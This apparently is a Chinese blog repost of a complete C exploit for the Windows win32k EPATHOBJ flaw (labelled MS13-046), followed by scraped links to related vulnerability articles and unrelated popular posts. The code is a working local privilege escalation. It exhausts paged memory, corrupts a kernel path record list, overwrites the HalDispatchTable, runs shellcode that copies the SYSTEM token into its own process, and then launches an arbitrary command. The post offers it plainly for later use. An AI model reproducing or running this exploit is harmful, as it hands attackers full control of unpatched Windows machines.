留此代码备用:“

/** thanks to: Tavis Ormandy & ProgmBoy & instruder* by [email]boywhp@126.com[/email]* build by WDK7600 * tested on windows 2003 x64 en* - 1.ImageBase=0x10000* - 2.wdk makefile.new disable DYNAMICBASE_FLAG=/dynamicbase*/#include <stdlib.h>
#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
#include <Shellapi.h>//#include <ntstatus.h>#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000#pragma comment(linker, "/SECTION:.text,ERW")//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
//POINT       Points[MAX_POLYPOINTS];
BYTE        PointTypes[MAX_POLYPOINTS];
HRGN*       pRegions = NULL;
ULONG       MaxRegions = 0;
ULONG       NumRegion = 0;HANDLE      Mutex;// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH   0x00000001
#define PD_ENDSUBPATH     0x00000002
#define PD_RESETSTYLE     0x00000004
#define PD_CLOSEFIGURE    0x00000008
#define PD_BEZIERS        0x00000010#define ENABLE_SWITCH_DESKTOP        1typedef struct  _POINTFIX
{ULONG x;ULONG y;
} POINTFIX, *PPOINTFIX;// Approximated from reverse engineering.
typedef struct _PATHRECORD {struct _PATHRECORD *next;struct _PATHRECORD *prev;ULONG               flags;ULONG               count;POINTFIX            points[4];
} PATHRECORD, *PPATHRECORD;PPATHRECORD PathRecord;
PATHRECORD  ExploitRecord = {0};
PPATHRECORD ExploitRecordExit;typedef struct _RTL_PROCESS_MODULE_INFORMATION {HANDLE Section;                 // Not filled inPVOID MappedBase;PVOID ImageBase;ULONG ImageSize;ULONG Flags;USHORT LoadOrderIndex;USHORT InitOrderIndex;USHORT LoadCount;USHORT OffsetToFileName;UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;typedef struct _RTL_PROCESS_MODULES {ULONG NumberOfModules;RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;typedef INT ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef INT ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef INT ( __stdcall *NtReadVirtualMemory_)( HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
typedef PVOID (__stdcall *PsGetCurrentProcess_)();
typedef PVOID (__stdcall *PsReferencePrimaryToken_)(PVOID Process);
typedef INT (__stdcall *PsLookupProcessByProcessId_)(HANDLE ProcessId, PVOID *Process);NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtQuerySystemInformation_ NtQuerySystemInformation;
NtReadVirtualMemory_ NtReadVirtualMemory;//#define __SHELL_CODE_MAGIC        0x11223344AABBCCDDtypedef struct _ShellCodeInfo{PVOID* MmUserProbeAddress;PVOID* WriteToHalDispatchTable; PVOID  NtSetEaFile;PVOID* PsInitialSystemProcess;DWORD  Pid; PsGetCurrentProcess_ PsGetCurrentProcess;PsLookupProcessByProcessId_ PsLookupProcessByProcessId;PsReferencePrimaryToken_ PsReferencePrimaryToken;
} ShellCodeInfo, *PShellCodeInfo;ShellCodeInfo GlobalInfo;#if defined (_WIN64)
#define MAX_FAST_REFS 15
#else
#define MAX_FAST_REFS 7
#endifint __stdcall ShellCode(PVOID x, PVOID y, PShellCodeInfo* pInfo, PVOID w)
{PShellCodeInfo info; //__SHELL_CODE_MAGIC;PVOID targetProcess, sysProcess, token;ULONG_PTR *p1, *p2;info = *pInfo;
#ifdef _WIN64  /* FIX MmUserProbeAddress -> ((ULONG_PTR)(0x80000000000UI64 - 0x10000)) */*info->MmUserProbeAddress = ((ULONG_PTR)(0x80000000000UI64 - 0x10000));
#else*info->MmUserProbeAddress = 0x7fff0000;
#endif/* x64 4参数: rcx, rdx, r8, r9 -直接c3即可 */*info->WriteToHalDispatchTable = info->NtSetEaFile;//if (info->PsLookupProcessByProcessId(info->Pid, &targetProcess) != 0)//        return 0xC0000019; p1 = targetProcess = info->PsGetCurrentProcess();p2 = sysProcess = *info->PsInitialSystemProcess;token = info->PsReferencePrimaryToken(sysProcess);/* token 4bit->refcnt */while ((*p2 & ~MAX_FAST_REFS) != token){p1++;p2++;}*p1 = token;return 0xC0000018;
}DWORD WINAPI WatchdogThread(LPVOID Parameter)
{//// This routine waits for a mutex object to timeout, then patches the// compromised linked list to point to an exploit. We need to do this.//printf("Watchdog thread %d waiting on Mutex\n", GetCurrentThreadId());if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {//// It looks like the main thread is stuck in a call to FlattenPath(),// because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean// up, and then patch the list to trigger our exploit.//while (NumRegion--)DeleteObject(pRegions[NumRegion]);printf("InterlockedExchangePointer(0x%p, 0x%p);\n", &PathRecord->next, &ExploitRecord);InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);} else {printf("Mutex object did not timeout, list not patched\n");}return 0;
}static int do_expoite(PVOID* addr, PVOID val, PBYTE cmd, PBYTE argv)
{HDC     Device;HDESK   Desk;ULONG   PointNum;HANDLE  Thread;ULONG   Size;INT     ret = -1;PBYTE   tmp = NULL;//// Create our PATHRECORD in user space we will get added to the EPATHOBJ// pathrecord chain.//PathRecord = (PPATHRECORD)VirtualAlloc(NULL, sizeof(PATHRECORD),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);memset(PathRecord, sizeof(PATHRECORD), 0xCC);////PathRecord->next = self //stuck here to wait for WatchdogThread set PathRecord->next = ExploitRecord//PathRecord->next    = PathRecord;PathRecord->prev    = (PPATHRECORD)(0x42424242);PathRecord->flags   = 0;//init ExploitRecordExit node ExploitRecordExit = (PPATHRECORD)VirtualAlloc(NULL, sizeof(PATHRECORD),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);ExploitRecordExit->next = NULL;ExploitRecordExit->next = NULL;ExploitRecordExit->flags = PD_BEGINSUBPATH;ExploitRecordExit->count = 0;////ensue ExploitRecord.next -> valid address and end record//ExploitRecord.next -> ExploitRecordExit node//ExploitRecord.next  = (PPATHRECORD)ExploitRecordExit;ExploitRecord.prev  = (PPATHRECORD)addr;ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;ExploitRecord.count = 4;printf("Alllocated PATHRECORDS:%p %p %p\n", PathRecord,ExploitRecord,ExploitRecordExit); tmp = malloc((int)ShellCode);printf("tmp->%p\n", tmp);printf("Creating complex bezier path with %x\n", (ULONG)(PathRecord) >> 4);//// Generate a large number of Belier Curves made up of pointers to our// PATHRECORD object.//for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
#ifdef _WIN64 Points[PointNum].x      = (ULONG)(PathRecord) >> 4;Points[PointNum].y      = 0;//(ULONG)(PathRecord) >> 4;
#elsePoints[PointNum].x      = (ULONG)(PathRecord) >> 4;Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
#endifPointTypes[PointNum]    = PT_BEZIERTO;}//// Switch to a dedicated desktop so we don't spam the visible desktop with// our Lines (Not required, just stops the screen from redrawing slowly).//Desk = CreateDesktop("DontPanic",NULL,NULL,0,GENERIC_ALL,NULL);SetThreadDesktop(Desk);MaxRegions = MAX_REGIONS;pRegions = realloc(NULL, sizeof(HRGN) * MaxRegions);Mutex = CreateMutex(NULL, TRUE, NULL);Device = GetDC(NULL);//// Spawn a thread to cleanup//Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);//// We need to cause a specific AllocObject() to fail to trigger the// exploitable condition. To do this, I create a large number of rounded// rectangular regions until they start failing. I don't think it matters// what you use to exhaust paged memory, there is probably a better way.//// I don't use the simpler CreateRectRgn() because it leaks a GDI handle on// failure. Seriously, do some damn QA Microsoft, wtf.//        //for (Size = 1 << 26; Size; Size >>= 1) {while (pRegions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1)){NumRegion++;if (NumRegion >= MaxRegions){MaxRegions = MaxRegions*2;pRegions = realloc(pRegions, sizeof(HRGN) * MaxRegions);}}}printf("Allocated %u/%u HRGN objects\n", NumRegion, MaxRegions);printf("Flattening curves...\n");//// Begin filling the free list with our points.//for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {BeginPath(Device);PolyDraw(Device, Points, PointTypes, PointNum);EndPath(Device);FlattenPath(Device);FlattenPath(Device);if (PathRecord->next != PathRecord){ret = NtReadVirtualMemory((HANDLE)-1, tmp, tmp, (SIZE_T)ShellCode, GlobalInfo.WriteToHalDispatchTable);if (ret == 0){printf("[*] exploit... %p!\n", &GlobalInfo);NtQueryIntervalProfile(&GlobalInfo, &ret);ret = 0;}break;}EndPath(Device);}printf("cleaning up...\n");//// If we reach here, we didn't trigger the condition. Let the other thread know.//ReleaseMutex(Mutex);CloseDesktop(Desk);ReleaseDC(NULL, Device);WaitForSingleObject(Thread, INFINITE);VirtualFree(PathRecord, sizeof(PATHRECORD), MEM_RELEASE);VirtualFree(ExploitRecordExit, sizeof(PATHRECORD), MEM_RELEASE);        free(tmp);free(pRegions);CloseHandle(Thread);return ret;
}int main(int argc, char **argv)
{HMODULE ntoskrnl = NULL;LONG ret;BOOL bRet = FALSE;HMODULE  ntdll;PRTL_PROCESS_MODULES mod = (PRTL_PROCESS_MODULES)&mod;PBYTE osBase;HMODULE hDllOs;      ULONG NeededSize;INT expCount = 0;STARTUPINFO si = {0};PROCESS_INFORMATION pi = {0};si.cb = sizeof(si);//GlobalInfo.Pid = GetCurrentProcessId(); //pi.dwProcessId;ntdll = GetModuleHandle("ntdll.dll");NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress(ntdll, "NtQueryIntervalProfile");NtQuerySystemInformation = (NtQuerySystemInformation_)GetProcAddress(ntdll, "NtQuerySystemInformation");NtReadVirtualMemory = (NtReadVirtualMemory_)GetProcAddress(ntdll, "NtReadVirtualMemory");if (!NtQueryIntervalProfile || !NtQuerySystemInformation|| !NtReadVirtualMemory){printf("error get ntdll fun address\n");return -1;}                /** NtQuerySystemInformation query sys module info* STATUS_INFO_LENGTH_MISMATCH = 0xC0000004*/ret = NtQuerySystemInformation(11, mod, 4, &NeededSize);if (0xC0000004 == ret){mod = malloc(NeededSize);ret = NtQuerySystemInformation(11, mod, NeededSize, NULL);}printf("ntos:%s->%p\n", mod->Modules[0].FullPathName + mod->Modules[0].OffsetToFileName,mod->Modules[0].ImageBase);osBase = mod->Modules[0].ImageBase;hDllOs = LoadLibraryA((LPCSTR)(mod->Modules[0].FullPathName + mod->Modules[0].OffsetToFileName));if (!hDllOs){printf("error reload os kernel\n");return -1;}free(mod);GlobalInfo.WriteToHalDispatchTable = (PBYTE)GetProcAddress(hDllOs, "HalDispatchTable") - (PBYTE)hDllOs + osBase + sizeof(PVOID);GlobalInfo.PsInitialSystemProcess = (PBYTE)GetProcAddress(hDllOs, "PsInitialSystemProcess") - (PBYTE)hDllOs + osBase;GlobalInfo.PsReferencePrimaryToken = (PBYTE)GetProcAddress(hDllOs, "PsReferencePrimaryToken") - (PBYTE)hDllOs + osBase;GlobalInfo.PsGetCurrentProcess = (PBYTE)GetProcAddress(hDllOs, "PsGetCurrentProcess") - (PBYTE)hDllOs + osBase;GlobalInfo.PsLookupProcessByProcessId = (PBYTE)GetProcAddress(hDllOs, "PsLookupProcessByProcessId") - (PBYTE)hDllOs + osBase;GlobalInfo.MmUserProbeAddress = (PBYTE)GetProcAddress(hDllOs, "MmUserProbeAddress") - (PBYTE)hDllOs + osBase; GlobalInfo.NtSetEaFile = (PBYTE)GetProcAddress(hDllOs, "NtSetEaFile") - (PBYTE)hDllOs + osBase;printf("HalDispatchTable - %p MmUserProbeAddress - %p NtSetEaFile - %p \n", GlobalInfo.WriteToHalDispatchTable, GlobalInfo.MmUserProbeAddress,GlobalInfo.NtSetEaFile);while (do_expoite(GlobalInfo.MmUserProbeAddress, NULL, argv[1], argc > 2 ? argv[2] : NULL) != 0){if (expCount > 0x10)break;}printf("[*]exe %s\n", argv[1]);if (!CreateProcess(NULL,        // No module name (use command line)argv[1], NULL,NULL,FALSE,0,                      //CREATE_NEW_CONSOLE | CREATE_SUSPENDED, NULL,NULL,&si,&pi)){printf("CreateProcess failed (%d)./n", GetLastError());return -1;}//ResumeThread(pi.hThread);CloseHandle(pi.hThread);CloseHandle(pi.hProcess);return 0;
}

MS13-046特权提升漏洞(转)相关推荐

  1. CVE-2020-1472 | Netlogon 特权提升漏洞预警

    CVE-2020-1472 | Netlogon 特权提升漏洞预警 CVE-2020-1472 | Netlogon 特权提升漏洞预警 https://www.cnblogs.com/micr067/ ...

  2. 是什么 通信中unit_Ubuntu Linux中的特权提升漏洞Dirty Sock分析(含PoC)

    2019年1月,由于默认安装的服务snapd API中的一个bug,通过默认安装的Ubuntu Linux被发现存在特权提升漏洞,任何本地用户都可以利用此漏洞直接获取root权限. 概述 首先在此提供 ...

  3. CVE-2020-1472 Netlogon特权提升漏洞分析及复现

    0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新 ...

  4. Netlogon特权提升漏洞

    0x01 漏洞概要 2020年8月11日,Microsoft公司发布安全公告,公布了Netlogon 特权提升漏洞(CVE-2020-1472)的相关信息.12日起,各大安全研究团队纷纷对该漏洞作出漏 ...

  5. NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决

    NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020 ...

  6. CVE-2020-1472: NetLogon特权提升漏洞通告

    1. CVE-2020-1472简要分析 阅读量    102057 | 分享到:       https://www.anquanke.com/post/id/217475 发布时间:2020-09 ...

  7. 超三万台电脑遭新恶意软件感染、联想修复特权提升漏洞|12月20日全球网络安全热点

    安全资讯报告 黑客在赎金被拒绝后在"暗网"上泄露了英国警方的机密数据 据英国<每日邮报>报道,英国一些警察部队持有的机密信息在一次令人尴尬的安全漏洞中被黑客窃取. 网络 ...

  8. 【微软漏洞分析】MS15-023 Win32k 特权提升漏洞 - CVE-2015-0078 + 绕过(CVE-2015-2527 in MS15-097)

    目录 MS15-023 CVE-2015-0078 微软漏洞描述 漏洞作者分析 补丁分析 win32k.sys NtUserGetClipboardAccessToken 重点分析 PoC分析 MS1 ...

  9. 微软NetLogon特权提升漏洞复现(CVE-2020-1472)

    2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告.攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限.成功 ...

  10. CVE-2020-0108 安卓前台服务特权提升漏洞

    文章目录 前言 正常前台服务 创建流程 实例程序 CVE-2020-0108 漏洞点A 漏洞点B 修复方案 总结 前言 前面一篇文章:Android应用自启动保活手段与安全现状分析 介绍了 Andro ...

最新文章

  1. matlab--微积分与微分方程
  2. Tableau系列之构建和浏览数据视图
  3. MyCat数据库分片
  4. spring mvc 总体概况
  5. 谈谈运维人员谨慎操作系统环境和管理
  6. Floyd算法 C++实现
  7. FTP文件服务搭建与同步传输
  8. Ajax学习笔记-get请求参数-4
  9. comsol如何定义狄利克雷边界_comsol边界条件
  10. MST703调试群创AT070TN92
  11. python——爬虫豆瓣250
  12. 2019 高教社杯数模竞赛A题 高压油管的压力控制 题解
  13. 平安新一贷怎么被拒了及原因是什么?你都知道吗?
  14. 三个限免网站,助你白嫖正版付费软件/游戏
  15. Scalar类-颜色类
  16. AutoIt 对于文件的操作
  17. sse 指令xmm寄存器和内存互相复制的问题
  18. 保护眼睛的颜色的各种色值,强力推荐!
  19. 有效前沿和最优投资组合matlab,matlab 实验名称:投资组合分析 实验性质:综合性和研究探索性 实 联合开发网 - pudn.com...
  20. Python实现图片添加水印(支持中文、英文和图片)

热门文章

  1. Opencv 笔记7 凸包算法-Graham扫描法
  2. python SSLError HTTPSConnectionPool bad handshake
  3. 笔记本电脑屏幕颜色变浅
  4. DAMA数据管理知识体系指南之数据安全管理
  5. 给你一台大疆无人机,你能用来做点啥?(二)-----——倾斜摄影建模
  6. JS 单引号、双引号与反引号的区别
  7. 经典编程习题,用Java实现:矩阵转置、最大公约数和最小公倍数、计算自然对数的底e的值、输出1000以内的回文素数、判断两个年份之间的平闰年情况。
  8. 《小窗幽记》全文 陈继儒
  9. 与大数据相关热门岗位有什么?
  10. 输入法框无法正常显示问题